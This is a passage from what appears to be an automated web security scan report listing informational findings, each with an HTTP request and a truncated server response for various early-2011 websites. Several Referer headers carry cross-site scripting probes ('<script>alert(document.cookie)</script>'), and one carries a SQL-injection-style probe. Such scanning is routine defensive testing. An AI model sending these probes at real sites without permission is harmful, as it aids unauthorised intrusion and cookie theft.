User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:01 GMT
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j
Last-Modified: Fri, 28 Nov 2008 19:18:35 GMT
ETag: "3d02e6-1ba4-4930440b"
Accept-Ranges: bytes
Content-Length: 7076
Connection: close
Content-Type: text/html

<HTML>

<HEAD>

<TITLE>XRN (X News reader)</TITLE>
<LINK REV="MADE" HREF="mailto:jik@kamens.brookline.ma.us">

</HEAD>

<BODY>

<CENTER>
<H1>XRN -- an X News reader</H1>
</CENTER>

<H2>What is XRN?</H
...[SNIP]...

30.125. http://www.munit.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.munit.co.uk
Path:   /

Request

GET / HTTP/1.1
Host: www.munit.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:15 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html
Content-Length: 4487


       <html>
       <head>
           <title>mLogix : Web Application Development in Orlando, FL | Welcome</title>
           
                   <script type="text/javascript">
        var _kmq = _kmq || [];
        function _kms(u){
           setTimeo
...[SNIP]...

30.126. https://www.mytraderonline.com/css/promoCSS.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /css/promoCSS.php

Request

GET /css/promoCSS.php HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1295921266915%7C1298513266915%3B%20s_lv%3D1295921266917%7C1390529266917%3B%20s_lv_s%3DFirst%2520Visit%7C1295923066917%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:07:55 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Content-Length: 4589
Connection: close
Content-Type: text/html


/***********************
   PROMOS
***********************/
.smlPromo3 {width: 249px; height: 293px;border: solid 1px #a2a2a2;background: url('/img/tol-designtol/gradient-179px-tile.jpg?') 0 0 repeat-
...[SNIP]...

30.127. https://www.mytraderonline.com/css/tolhomecss.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /css/tolhomecss.php

Request

GET /css/tolhomecss.php HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1295921299027%7C1298513299027%3B%20s_lv%3D1295921299028%7C1390529299028%3B%20s_lv_s%3DFirst%2520Visit%7C1295923099028%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:29:26 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 8747

/******************
INDEX
*******************/
#idxTop{float:left;width:399px;margin-bottom:0;}
#idxBot{float:left;width:556px;border-left:2px #a2a2a2 solid;margin-bottom:0;}
#tileLftTp,#tileRtT
...[SNIP]...

30.128. https://www.mytraderonline.com/javascript/master_s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /javascript/master_s_code.js

Request

GET /javascript/master_s_code.js HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:07:43 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 32370

/**************************
flicker
***************************/
try {
document.execCommand('BackgroundImageCache', false, true);
} catch(e) {}


function tourWndw() {
    var imtTour=wind
...[SNIP]...

30.129. https://www.mytraderonline.com/javascript/realmedia.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /javascript/realmedia.js

Request

GET /javascript/realmedia.js HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:07:45 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Content-Length: 2571
Connection: close
Content-Type: text/html


   // Instantiate the real media variables
   var oas='https://oasc05.247realmedia.com/RealMedia/ads/';
   var RN = new String (Math.random());
   var RNS = RN.substring (2,11);
   var _version = 40;

   // Fun
...[SNIP]...

30.130. http://www.netlingo.com/includes/category.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /includes/category.php

Request

GET /includes/category.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 1275
Connection: close
Content-Type: text/html

<script language="javascript" src="scripts/jquery.hint.js"></script>
<script language="javascript" type="text/javascript">
   
</script>
<div class="tab">
<div class="subscribe_box">

...[SNIP]...

30.131. http://www.netlingo.com/iphone/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /iphone/

Request

GET /iphone/ HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32376


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
<
...[SNIP]...

30.132. http://www.netlingo.com/iphone/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /iphone/index.php

Request

GET /iphone/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32385


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
<
...[SNIP]...

30.133. http://www.netlingo.com/more/adsizes.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /more/adsizes.php

Request

GET /more/adsizes.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 29473


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
...[SNIP]...

30.134. http://www.netlingo.com/more/color/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /more/color/index.php

Request

GET /more/color/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 275
Connection: close
Content-Type: text/html

<html><head><title>NetLingo: Web Coloring Book!</title></head>
<frameset rows="20%,80%" frameborder="0" framespacing="0" border="0">
<frame name="rendered" src="rendered.html" noresize scrolling=no
...[SNIP]...

30.135. http://www.newsguy.com/overview.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsguy.com
Path:   /overview.htm

Request

GET /overview.htm HTTP/1.1
Host: www.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:24 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0b3bde5ef4c5042fc11d526d2dd84342; path=/
Content-Length: 33263
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Newsguy's Account Options</title>
<meta NAME="descript
...[SNIP]...

30.136. http://www.newsreaders.com/unix/utilities.html/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsreaders.com
Path:   /unix/utilities.html/x22

Request

GET /unix/utilities.html/x22 HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:14 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2652

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">


<!-- start header -->
<!-- Last changed 2000/07/21 -->
<!-- TITLE: X -->
<!-- COLOR: X -->
<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...

30.137. http://www.nih.at/cg/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nih.at
Path:   /cg/

Request

GET /cg/ HTTP/1.1
Host: www.nih.at
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:09 GMT
Server: Apache/2.2.9 (Debian) Embperl/2.2.0 DAV/2 PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8
Accept-Ranges: bytes
Content-Length: 3659
Connection: close
Content-Type: text/html

<html>
<head>
<title>NiH: cg</title>
<link rel="stylesheet" href="../style.css" type="text/css">
<link rel="shortcut icon" href="../images/NiH-favicon.ico" type="image/x-icon">
<link rel="alt
...[SNIP]...

30.138. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Request

GET /onlinepubs/009629399/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:04:25 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 19841

<!-- Copyright 1997 The Open Group, All rights reserved -->
<html><head>


<title>DCE 1.1: Remote Procedure Call - Universal Unique Identifier</title>
</head><body><center><a href="chap14.htm">Previou
...[SNIP]...

30.139. http://www.openusenet.org/diablo/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.openusenet.org
Path:   /diablo/

Request

GET /diablo/ HTTP/1.1
Host: www.openusenet.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Tue, 27 Oct 2009 10:23:15 GMT
ETag: "138007-1108-476e810e86ac0"
Accept-Ranges: bytes
Content-Length: 4360
Connection: close
Content-Type: text/html

<html>
<head><title>Diablo Usenet Software</title></head>
<body bgcolor="#ffffff">
<center>
<h2>Diablo Usenet Software</h2>
<h4>Welcome to the home of Diablo - newsfeeding and newsreading server softw
...[SNIP]...

30.140. http://www.ossp.org/pkg/tool/lmtp2nntp/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ossp.org
Path:   /pkg/tool/lmtp2nntp/

Request

GET /pkg/tool/lmtp2nntp/ HTTP/1.1
Host: www.ossp.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:46 GMT
Server: Apache/2.2.8 (OpenPKG/CURRENT)
Last-Modified: Mon, 31 Mar 2008 22:42:38 GMT
ETag: "60600e-8281-449c35e657380"
Accept-Ranges: bytes
Content-Length: 33409
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="ICON" href="../../../SHARE/ossp_img/ossp-icon.ico">
<link rel="SHORTCUT ICON" href="../../../SHARE/ossp_img/o
...[SNIP]...

30.141. http://www.paperg.com/jsfb/embed.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Request

GET /jsfb/embed.php?pid=3922&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39271


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.
...[SNIP]...

30.142. http://www.rdrop.com/users/billmc/adcomplain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rdrop.com
Path:   /users/billmc/adcomplain.html

Request

GET /users/billmc/adcomplain.html HTTP/1.1
Host: www.rdrop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:07 GMT
Server: Apache/1.3.20 (Unix) mod_jk mod_ssl/2.8.4 OpenSSL/0.9.6
Last-Modified: Wed, 16 May 2001 16:52:58 GMT
ETag: "4520-57b-3b02b06a"
Accept-Ranges: bytes
Content-Length: 1403
Connection: close
Content-Type: text/html

<HTML><HEAD><TITLE>Adcomplain Home Page</TITLE>
<BODY><H1>Adcomplain Home Page</H1>

Adcomplain is a tool for reporting inappropriate commercial e-mail and
usenet postings, as well as chain letters an
...[SNIP]...

30.143. http://www.sailinganarchy.com/ADs/nauticexpo/nauticexpo.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /ADs/nauticexpo/nauticexpo.htm

Request

GET /ADs/nauticexpo/nauticexpo.htm HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Apache
Last-Modified: Thu, 19 Nov 2009 23:43:14 GMT
ETag: "34a303-85e6-ec38a880"
Accept-Ranges: bytes
Content-Length: 34278
Vary: User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>
Sailboats, Catamarans, Sailing dinghies, Mainsails, Drysuits - NauticExpo </title>

...[SNIP]...

30.144. http://www.sailinganarchy.com/breymaiersailing.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /breymaiersailing.com

Request

GET /breymaiersailing.com HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 1984


<html>
<head>
<title>NetHere: URL Not Found (404)</title>
<link rev="made" href="mailto:webmaster@sailinganarchy.com">
<style>
a:link {
color : #092769;
}
a:visited {
color : #092769;

...[SNIP]...

30.145. http://www.sailinganarchy.com/none

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /none

Request

GET /none HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Apache
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 1984


<html>
<head>
<title>NetHere: URL Not Found (404)</title>
<link rev="made" href="mailto:webmaster@sailinganarchy.com">
<style>
a:link {
color : #092769;
}
a:visited {
color : #092769;

...[SNIP]...

30.146. http://www.soundingsonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html

<br />
<b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>E:\Inetpub\SoundingsOnline\libraries\joomla\database\database\mysql.php</b> on line <b>221</b><br />

30.147. http://www.soundingssellmyboat.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingssellmyboat.com
Path:   /

Request

GET / HTTP/1.1
Host: www.soundingssellmyboat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 315
Content-Type: text/html
Content-Location: http://www.soundingssellmyboat.com/index.htm
Last-Modified: Thu, 13 Aug 2009 17:35:47 GMT
Accept-Ranges: bytes
ETag: "b95287e3c1cca1:64e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 04:39:54 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Soundings Sell My Boat</title>

<meta http-equiv="REFRESH" content="0;url=https://www.soundingssellmyboat.com/w
...[SNIP]...

30.148. http://www.traderonline.com/css/promoCSS.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /css/promoCSS.php

Request

GET /css/promoCSS.php HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:57 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 5249


/***********************
   PROMOS
***********************/
.smlPromo3 {width: 249px; height: 293px;border: solid 1px #a2a2a2;background: url('http://tolimages.traderonline.com/img/tol-designtol/gradi
...[SNIP]...

30.149. http://www.traderonline.com/css/tolhomecss.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /css/tolhomecss.php

Request

GET /css/tolhomecss.php HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8009oaoAAx1V; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; s_pers=%20s_nr%3D1295884785350%7C1298476785350%3B%20s_lv%3D1295884785352%7C1390492785352%3B%20s_lv_s%3DFirst%2520Visit%7C1295886585352%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.2.10.1295884751

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9341

/******************
INDEX
*******************/
#idxTop{float:left;width:399px;margin-bottom:0;}
#idxBot{float:left;width:556px;border-left:2px #a2a2a2 solid;margin-bottom:0;}
#tileLftTp,#tileRtT
...[SNIP]...

30.150. http://www.traderonline.com/javascript/master_s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /javascript/master_s_code.js

Request

GET /javascript/master_s_code.js HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:32 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 32369

/**************************
flicker
***************************/
try {
document.execCommand('BackgroundImageCache', false, true);
} catch(e) {}


function tourWndw() {
    var imtTour=wind
...[SNIP]...

30.151. http://www.traderonline.com/javascript/realmedia.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /javascript/realmedia.js

Request

GET /javascript/realmedia.js HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:34 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 2566


   // Instantiate the real media variables
   var oas='http://ads.traderonline.com/RealMedia/ads/';
   var RN = new String (Math.random());
   var RNS = RN.substring (2,11);
   var _version = 40;

   // Functio
...[SNIP]...

30.152. http://www.traderpub.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traderpub.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.traderpub.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/4.0
Date: Mon, 24 Jan 2011 16:04:25 GMT
Content-type: text/html
Content-length: 207

<TITLE>Not Found</TITLE><H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you ha
...[SNIP]...

30.153. http://www.traderpub.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traderpub.com
Path:   /x22

Request

GET /x22 HTTP/1.1
Host: www.traderpub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/4.0
Date: Mon, 24 Jan 2011 15:15:23 GMT
Content-type: text/html
Content-length: 207
Connection: close

